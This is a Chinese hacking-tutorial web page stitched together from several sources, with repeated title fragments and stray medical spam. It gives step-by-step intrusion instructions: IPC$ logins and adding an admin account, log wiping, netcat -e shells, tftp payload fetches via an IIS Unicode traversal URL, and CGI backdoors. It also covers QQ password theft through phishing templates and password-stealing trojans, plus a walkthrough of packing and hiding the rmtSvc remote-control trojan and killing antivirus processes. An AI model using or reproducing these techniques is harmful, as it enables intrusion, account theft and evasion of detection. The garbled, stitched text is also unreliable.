文章并不是原创实在找不到文章的来源了,所以就不把原创作者给发上来了,希望作者体谅。(www.loach.net.cn)与远程主机建立空管连接 net use \IP地址ipc$ "" /use:""   以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator"   传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$   查看远程主机时间 net time \IP地址   定时启动某个程序 at \IP地址 02:18 readme.exe   查看同享 net view \IP地址   查看netbios工作组列表 nBTstat -A IP地址   将远程主机C盘映照为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator"   这两条把自己增加到管理员组: net user 用户名 密码 /add   net locaLGroup Administrators 用户名 /add   断开连接 net use \IP地址ipc$ /delete   扫尾:   del C:winntsystem32logfiles*.*   del C:winntssytem32config*.evt   del C:winntsystem32dTCLog*.*   del C:winntsystem32*.log   del C:winntsystem32*.txt   del C:winnt*.txt   del C:winnt*.log 1、netsvc.exe   下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:   netsvc /list \IP地址   netsvc schedule \IP地址 /query   netsvc \IP地址 schedule /start 2、OpenTelnet.exe   远程启动主机的Telnet服务,并绑定端口到7878,例如:   OpenTelnet \IP地址 用户名 密码 1 7878   然后就能够telnet到主机的7878端口,进入DOS方式下:   telnet IP地址 7878 3、winshell.exe   1个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:   p Path (查看winshell主程序的路径信息)   b reBoot (重新启动机器)   d shutDown (关闭机器)   s Shell (履行后你就会看到可爱的“C:>”)   x eXit (退出本次登录会话,此命令其实不终止winshell的运行)   CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 4、3389登陆器,GUI方式登录远程主机的 5、elsave.exe   事件日志清除工具   elsave -s \IP地址 -l "application" -C   elsave -s \IP地址 -l "system" -C   elsave -s \IP地址 -l "security" -C   履行后成功清除利用程序日志,系统日志,安全日志 6、hbulot.exe   开启win2kserver和winxp的3389服务   hbulot (/r) 7、nc.exe(netcat.exe)   1个很好的工具,1些脚本程序都要用到它,也可做溢出后的连接用。   想要连接到某处: nc (-options) hostname port(s)(ports) ...   绑定端口等待连接: nc -l -p port (-options) (hostname) (port) 参数:   -e prog 程序重

知道ip怎样入侵 黑客技术之知道对方IP入侵他人电脑黑客

定向,1旦连接,就履行 (危险!)   -g gateway source-routing hop point(s), up to 8   -G num source-routing pointer: 4, 8, 12, ...  -h 帮助信息   -i secs 延时的间隔   -l 监听模式,用于入站连接   -n 指定数字的IP地址,不能用hostname   -o file 记录16进制的传输   -p port 本地端口号   -r 任意指定本地及远程端口   -s addr 本地源地址   -u UDP模式   -v 详细输出——用两个-v可得到更详细的内容   -w secs timeout的时间   -z 将输入输出关掉——用于扫描时 8、TFTPD32.EXE   把自己的电脑临时变成1台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上履行,通常要利用Unicode漏洞或telnet到肉鸡,例如:   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名   然后可以直接令文件运行:   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 9、prihack.exe是IIS的printer远程缓冲区溢出工具  idqover.exe是溢出idq的,选择“溢出后在1个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,1连它的端口,绑定的命令马上履行。(www.loach.net.cn)xploit.exe是1个图形界面的ida溢出,成功以后winxp下需要打winxp。 1○、ntis.exe、cmd.exe和cmdasp.asp是3个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP履行权限的目录。然后用IE阅读器连接.“远程破解”与“本地破解”正好相反,是指QQ盗号者通过网络偷盗远端QQ用户的密码。这类QQ破解有很多方法,如在线密码破解、登录窗口破解、邮箱破解、消息欺骗和五花八门的QQ木马病毒等。下面就让我们1同来看看这些QQ密码的远程破解是怎样实现的。 1、在线密码破解 大家知道QQ可以利用代理服务器登录,这是1种保护措施。它不但可以隐藏用户的真实IP地址,以免遭受网络攻击,还可以加快登录速度,保证登录的稳定性。 在线密码破解和本地密码破解采取的技术方法类似,都是穷举法,只不过前者完全脱离了本地用户使用的QQ。它通过对登录代理服务器进行扫描,只要想盗的QQ号码在线,便可利用在线盗号工具实现远程TCP/IP的追捕,从而神不知鬼不觉地盗取QQ密码! 在线破解改变了本地破解那种被动的破解方式,只要是在线的QQ号码都可以破解,适用范围较广。但是由于它依然采取穷举法技术,所以在枚举密钥位数长度和类型时,校验时间很长,破解效力不高。一样,这类方法还遭到电脑速度、网速等诸多因素的影响,因此比前面的本地破解更麻烦。 目前功能比较强大的1款QQ密码在线破解

知道ip怎样入侵 黑客技术之知道对方IP入侵他人电脑黑客

软件叫QQExplorer。(www.loach.net.cn)它的破解操作分4步:第1步,在QQ起始号码和结束号码中填上想要盗取的QQ号码(此号码必须在线);第2步,在“添加或删除HTTP代理服务器”中输入代理服务器的IP地址和端口号码(如果你嫌自己寻觅QQ代理服务器麻烦,可使用1些现代的QQ代理公布软件);第3步,点击“添加&测试”按钮,软件先自动检测此服务器是不是正常,肯定后将它加入代理服务器列表(此软件可填入多个代理服务器的地址,并且能够自动挑选不可用或速度慢的服务器);第4步,点击“开始”按钮,开始在线密码破解…… 2、登录窗口破解 捏造QQ登录窗口的盗号方法非常简单,这是1种比较另类的木马破解方法(后面对木马破解有专门讲述)。先用盗号软件生成1个假装的QQ主程序,它运行后会出现跟腾讯QQ1模1样的登录窗口,只要用户在这个伪登录窗口中登录,输入的QQ号及密码就会被记录下来,并通过电子邮件发送到盗号者指定的油箱中,在此以1款叫“狐Q”的软件为例,首次运行它时,它会把本身复制到QQ目录中,并把原来的QQ.exe文件改名为QQ.com(这样的更改不会影响QQ的正常运行)。设置终了后,“狐Q”的原程序就会消失,假装成QQ等待“猎物”上钩……在其软件设置中,有1项设置可以决定真假QQ交替运行的次数,可以减少用户在使用QQ时产生的怀疑。比如说将“生效次数”设定为3,那末用户第1次运行的是真QQ了,也就是说在第3次运行时,用户的QQ号便被盗了!在QQ密码发送的进程中,如果发送失败,它还会把QQ号和密码记下来,等待下1次发送。 即时监视QQ登录窗口的盗号方法利用Windows窗口函数、句柄功能实现QQ号和密码的后台截取。此类软件几近可以捕获Windows下所有标准密码框中的密码,如QQ、Outlook、屏幕保护程序、各种电子邮件客户端、各种游戏账号和上网账号等。捕获后,它也会将密码实时发送到盗号者指定的邮箱中。其代表性的盗号软件是“密码使者”,它几近可以捕获Windows 9x/2000/XP下所有登录窗口中的密码,并且还能够盗取在网页中登录的各种密码。盗号在使用这款软件时,只须填上用于接收他人QQ密码的邮箱地址及保护密码,并把生成的盗号器文件传过去哄骗他人运行,然后就能够坐等密码上门!此软件与传统的键盘记录器不同,它在电脑每次开机时隐藏自启动,不管密码是用键盘输入的,还是复制、粘贴的,都能够有效地实时拦截!其注册版本竟然还带有自动升级的功能,破坏力10分巨大。3、邮箱破解 利用邮箱盗取QQ密码也是1种比较经常使用的方法。我们都知道,腾讯公司在对用户的QQ号

知道ip怎样入侵 黑客技术之知道对方IP入侵他人电脑黑客

码进行验证时需要用户填写电子邮箱。(www.loach.net.cn)对申请了“密码保护”功能的用户,在腾讯主页上找回遗忘的密码时,密码会被发送到用户注册时的邮箱中。所以,只要盗号者破解了对方的电子邮箱,就有机会得到其QQ密码!通常我们在对方QQ注册时填写的邮箱。至于如何破解电子邮箱,具体的操作方法有多种,由于它有点超越文本的范畴,所以大家可以自己上网查询相干资料,在此就不赘述了。 4、消息欺骗 孔子曰:上士杀人用笔端,中士杀人用语言,下士杀人用石盘。远程盗取QQ密码还有1种大家最多见也是最简单最有效的方法,那就是利用很多人爱贪小便宜的弱点,进行人为的欺骗! 标题:腾讯关于xxxxx获奖通知 “QQ荣幸儿:恭喜!!!您已成为QQ在线网友齐抽奖的中奖用户。您将获赠精美T恤1件,并有机会得到NOKIA 7110手机1部。腾讯公司(tencent.com)注:奖品是以邮寄方式寄出,请您认真填写以下资料。如果填写毛病,将被作为自动放弃获奖机会处理。> > QQ号码:> 密码:> 姓名:> E-mail地址:> 身份证号码:> 通讯地址:> 联系电话:> 邮编:” 比如我们的QQ常常会收到以下的陌生人消息。 如果你真的照实填写这些资料并傻傻的发送回去,不1会儿QQ密码就被盗了。 还有类似这样的消息:“亲爱的***号QQ用户,恭喜你你已成为腾讯的荣幸号码,腾讯公司送你QQ靓号:12345,密码:54321。请尽快登陆并修改密码,感谢您对腾讯公司的支持!”很多人1看,以为白捡的便宜来了 ,登录1试还是真的,因而就大大咧咧地笑纳了。但是,很多人为了方便,不管甚么东西都爱使用相同的密码,所以当这个QQ号的密码被你改成与自己QQ号相同的密码时,自己QQ号的连同这个赠送的QQ号都得玩完!这是由于,赠送的QQ号已被盗号者申请过密码保护,当你更改密码后他就利用腾讯的密码保护功能把它收了回去,同时也收走你的QQ密码。如果你的QQ没有申请过密码保护,此刻就只能和它永别了。 5、更多的木马破解 “古希腊大军围攻特洛伊城,久攻不破,遂造1大木马藏匿将士于其中,大部队伪装撤退而弃木马。城中得知敌退,将木马作战利品拖入城内。午夜时分,匿于木马中的将士开启城门4处纵火,城外伏兵涌入,里应外合,焚屠特洛伊城。”这是古希腊神话《木马屠城记》的故事,其中那只木马被黑客程序借用其名,表“1经潜入,后患无穷”之意。1个完全的木马程序由服务器端和控制端组成。所谓“中了木马”,是指用户的电脑中被安装了木马的服务器端,而具有控制真个盗号者就通过网络远程控制该电脑,从而轻而易举地

知道ip怎样入侵 黑客技术之知道对方IP入侵他人电脑黑客

盗得该缒灾械腝Q密码。[www.loach.net.cn] 针对QQ的木马程序多不胜数,其中专门盗取QQ密码的也有1大堆,它们被偷偷地安装在用户的电脑中,随电脑启动而自动运行,如果用户使用QQ,那末其账号和密码就会被这些木马记录下来,并发送到木马安装者的邮箱中。前面已介绍了两款通过登录窗口盗号的QQ木马,下面再介绍两款典型的。 第1款:极品QQ盗号2004 这是“极品QQ盗号”木马的最新版本。它的使用方法跟前面介绍的“密码使者”差不多,先再“设置”栏中填入接收QQ密码的邮箱地址和发送邮件的标题,然后把生成的盗号器偷偷地安装到他人的电脑里……这个木马宣称可以避过主流的杀毒软件,盗取QQ最新版本的密码,即QQ2004和QQ2004奥运特别版的密码。 第2款:QQ特务3.0 使用此木马软件时,点击工具条上的“服务端”,依照提示生成服务端程序,然后把它偷偷地传到他人的电脑中,当受害者不谨慎运行了它,木马就被种上了。这个木马不但可以盗号,还能悄悄地在后台记录受害者的QQ聊天信息,并下载可履行文件实现远程升级和远程履行脚本程序。另外再注册以后,它还可以直接远程监控对方电脑上的QQ聊天记录。 利用木马软件盗取QQ密码,明显比用前面介绍的那些破解方法更有效力!不但节省时间,而且成功率也高。但是,如何把木马程序的服务器端安装在用户的电脑中,这是1个费心思的事儿。另外,很多功能强大的木马程序都是需要花钱注册,才能使用其全部功能。因此,对那些水平良莠不齐的盗号者而言,要想玩转木马程序,还得费点劲。听说过灰鸽子、冰河等可以实现远程控制,但你听说过IE也能够实现吗?不错,1款基于IE的新鲜工具——rmtSvc&vIDC便可让微软的IE成为1个超级黑客爪牙。本文除将为你展现rmtSvc&vIDC是如何基于IE远程控制肉鸡之外,更在如何“暗杀”杀毒软件、攻击思路上有较强的指点性。 如果我问你IE能做甚么?你的答案绝对不完全!IE可不单单能阅读网页。如果我再告知你IE还能用来远程控制、远程传输、进程管理、代理服务,乃至远程开启Telnet、FTP服务等等呢?你1定觉得不可思议吧,有了rmtSvc&vIDC,这1切皆有可能! 1、有IE 想黑就黑 简单点说,rmtSvc是1款集FTP、Telnet服务、Proxy服务和vIDC服务的远程控制工具。用户可以通过此款工具方便地对远程计算机进行控制。此工具和其它远程控制工具不同,它采取B/S结构(无需安装),用户可通过阅读器进行远程控制(我们的口号是:有IE,想黑就黑!)。 下面,笔者就以入侵控制的实例来为大家分别介绍rmtSvc经常使用功能的使

知道ip怎样入侵 黑客技术之知道对方IP入侵他人电脑黑客

用方法及技能。(www.loach.net.cn)解压下载后的紧缩包,先别急着让rmtSvc.exe在目标机运行(未加壳的程序会遭到杀毒软件的查杀),笔者先告知大家如何给源程序加壳从而避免被查杀吧(不然就没得玩了-_-|)。运行该软件,进入“选项”菜单,勾选“保存额外数据”,然后“打开文件”,选择源程序rmtSvc.exe后就会自动紧缩了。 特别提示:紧缩后的rmtSvc.exe不会被杀毒软件查杀,而且文件体积会减少近50%(经过金山毒霸6增强版、KV2005、诺顿2005测试),如果想进1步增强隐蔽性,请参考2004年第50期G9版《披着羊皮的狼——将Radmin改造为百分百木马》1文介绍的“超级捆绑”软件的使用方法。木马程序的欺骗发送本文就不作进1步讨论了。 2、武装RmtSvc “暗杀”杀毒软件 1.打开阅读器输入http://IP:port(其中IP为被控机的IP地址,port为rmtSvc的服务端口,默许为7778)。连接成功后将会看到如图1的欢迎登录画面,输入访问密码(默许为123456),就能够进行rmtSvc所支持的操作(如果之前已连同msnlib.dll和webe目录都发给了对方,那末rmtSvc将会多出用MSN进行远程控制和HTTP方式文件管理的功能)。 2.欢迎登录画面的上方为rmtSvc的系统菜单,从左至右的功能顺次为:Pview (进程查看)、Spy++(远程控制管理)、Proxy(启动或停止rmtSvc的代理服务)、vIDC(设置vIDCs的访问权限)、logoff(注销对rmtSvc登录)、Option(配置rmtSvc的运行参数)、About(rmtsvc欢迎/登录画面)。 3.第1次登录需进入rmtSvc的参数设置更改敏感信息(图2),这样才能保障其安全性。先在“Modify Password”修改rmtSvc访问密码,再在“Service Port”更改rmtSvc服务端口为任意1个4位不经常使用的端口(需要重启服务才会生效,建议设为高端端口)。然后将“Start Control、Stolen mode”选上,这样rmtSvc会自动安装为Windows服务随机启动且服务为隐藏属性,这也就意味着在下次启动时,你可以继续控制目标机器。 4.接下来在“Start mode”选项中,设置rmtSvc运行后自动启动FTP和Telnet服务(另外还有Proxy、vIDCs映照等)。通过FTP可以方便地进行文件上传下载。再将“Auto install service”和“Forbid detaching Dll”选择上,这样每次程序运行时会自动检测rmtSvc服务是不是已安装,如果没有安装则自动安装为服务(相当于自我修复功能)并释放1个DLL文件(可修改文件名,默许为inject.dll),这是为了避免自动释放的未加壳的DLL被杀毒软件查杀,用户可以选择不释放DLL。手工将加壳后的DLL拷入到被控机的系统目录下,在释放DLL的名称处填入你加壳后的DLL名称。 高手传经:rmtSvc释放的DLL主要有以下用途:隐藏进程、摹拟“Ctrl+Alt+D

知道ip怎样入侵 黑客技术之知道对方IP入侵他人电脑黑客

el”按键、显示密码框密码、监视rmtSvc运行情况。[www.loach.net.cn]如果异常退出或被杀掉则会自动重新启动,将配置参数写入rmtSvc程序本身(强烈建议选择)。 5.接下来在“Killed Program”中,设定rmtSvc监视并自动杀掉的进程名称,如有多个进程,各个名称之间以逗号分隔。例如输入:PFW.exe,KAVSvc.exe就能够把金山毒霸和天网防火墙关闭。 6.1切设置无误后,点击“Save”保存当前配置,在弹出的对话框中输入reg,将配置参数写入到注册表。输入self则是将配置参数写入该EXE文件本身,如果填写其它则会生成相应文件名的.exe的副本,并将配置参数写入此EXE副本。例如:输入c:\abc.exe,将在c盘根目录下生成1个abc.exe副本,并将配置参数写入此副本。 7.随后rmtSvc服务会重新启动运行。 高手传经:隐藏模式下才可以将配置参数写入EXE本身,如果没有保存,每次在rmtSvc正常退出时也会将配置参数写入EXE本身。 8.再次使用新设密码登录后,单击Pview进入“进程查看”页面,在这里将显示3个部份的信息:系统信息、进程/模块信息、CPU/内存使用信息。在页面的右侧为进程模块显示区域,点击某个进程名则显示此进程的相干模块信息,点击“Kill It”按钮就能够杀掉该进程(需要注意的是进程列表不会实时自动刷新,用户必须手工刷新)。现在你的rmtSvc已被武装到了牙齿,还等甚么,可以出手了。 3、用IE控制过把瘾 把挡路的安全软件给“暗杀”后,接下来就能够趁对方不在时使用Spy++远程控制管理来远程控制机器了。固然在控制前我们需要将相干参数设置妥当,这样才能得到更好的控制效果。 1.在“Quality”显示效果当选择Good(好),“Stretch”设置捕获图象的缩小比率80%。最后将“Cursor”选上,这样在捕获远程计算机屏幕时就会连同鼠标光标1起捕捉,以便用户知道当前鼠标光标位置。设置好后点击“Set”使上述3个参数生效。 2.接下来就能够尝试控制了。当远程桌面图象处于焦点状态(鼠标在图象区域内),你就能够直接敲击键盘发送按键信息,和你操作本地机器1样。但是对输入大段的文本这是非常不方便的,由于你的每次按键动作都会作为1次HTTP要求发出,输入速度很慢。 如果你想输入大段文本,可以将鼠标选中Input输入框,然后输入你想要发送的文本,按下回车便可;如果选中了Crlf复选框,则在你输入的文本后面会自动加入回车换行。 3.但是在进行远程计算机登录时,有些机器可能没法通过Input输入框直接输入登录密码,只能通过摹拟键盘输入登录密码。方法以下:通过鼠标直接点击桌面图象,系统会自动辨认你的鼠

知道ip怎样入侵 黑客技术之知道对方IP入侵他人电脑黑客

标的单击、双击键信息。(www.loach.net.cn]如果你在按下鼠标的同时按下了“Shift”、“Alt”或“Ctrl”键,系统也能自动辨认。 4.为了更方便地控制远程桌面,可以将远程桌面图象设为自动刷新,这样就不会出现有动作发出而图象没有变化需要手工刷新的情况了。方法以下,勾选“Auto-refresh”项,在右侧输入自动刷新间隔,默许为500ms。 高手传经:如果想知道远程被控机中密码框中的密码。则需要用到Password→Text项,在有密码框时此项会变成Text→Password。此时只要用鼠标左键点击远程桌面图象的密码输入框,则远程被控机密码框中的密码会被翻译成明文显示。如果你取消此项功能,点击Text→Password项便可,此时此项就会变成Password→Text。 5.如果要远程履行程序,选择Start下拉列表框的Run项,输入你要远程履行的文件名和参数便可,使用方法和Windows的开始菜单的运行命令1致。 如此这般,通过IE就可以像操作本机1样控制目标机了。 4、FTP/Telnet 1个都不能少 远程控制仿佛其实不能让我们感到满足,那就再来开启对方的FTP/Telnet服务,完全过把入侵瘾吧。 1.进入“FTP&Telnet”菜单,点击FTP/Telnet服务旁边的“Run”就能够启动相干服务了。FTP/Telnet port:设置FTP/Telnet服务的端口,默许FTP为2121,Telnet为2323。Anonymous access:设置访问FTP服务的权限,是不是允许匿名访问(enable),如果不允许则设置访问的用户名和密码。 2.另外,我们还要允许设置不同访问的账号,每一个账号可以指定是不是可写/可删除/可履行和设置不同的FTP根目录。可以在FTP设置的文本输入框中输入多个访问账号信息,各个账号信息用回车换行分隔,账号信息格式以下: [账号名] SP [密码] SP [访问权限] SP [允许访问的目录] CRLF高手传经:设置PERMISSION(访问权限)时,0:仅仅只读,1:可写,3:可写并且可删除 7:可写可删除可履行。例如:[cytkk] sp [123456] sp [7] sp [c:] 就建立了1个具有管理员权限,密码为123456的cytkk账户。 3.此时FTP账号信息仅仅写入注册表保存,不会保存到EXE中。 现在就能够利用FTP工具和Windows自带的Telnet工具进行登录和操作了,此时你想怎样玩就怎样玩吧! 到此,RmtSvc基本功能的使用大家就已学会了,限于篇幅,它更多的功能就不在此逐一举例了。黑客已成为1种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿他人开玩笑,弄些恶作剧。其实黑客的最高境地在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要晓得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在

知道ip怎样入侵 黑客技术之知道对方IP入侵他人电脑黑客

满天都是黑客教程,但真正有用的不多,下面介绍1种WIN9X下的入侵方法: 1.获得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。[www.loach.net.cn) 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反应的信息既是对方的上网地点。 3.得到对方的电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第1行是对方电脑名称 第2行是对方电脑所在工作组 第3行是对方电脑的说明。 4.在Windows目录下有1文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件:XX.XX.XX.XX 电脑名。 5.开DOS窗口键入 NBTSTAT -R。 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击便可进入。 以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址.

牛皮癣的发病都和哪些因素有关?患上白癜风以后患者须要看一些护理知识乌鲁木齐牛皮癣最好医院

相关推荐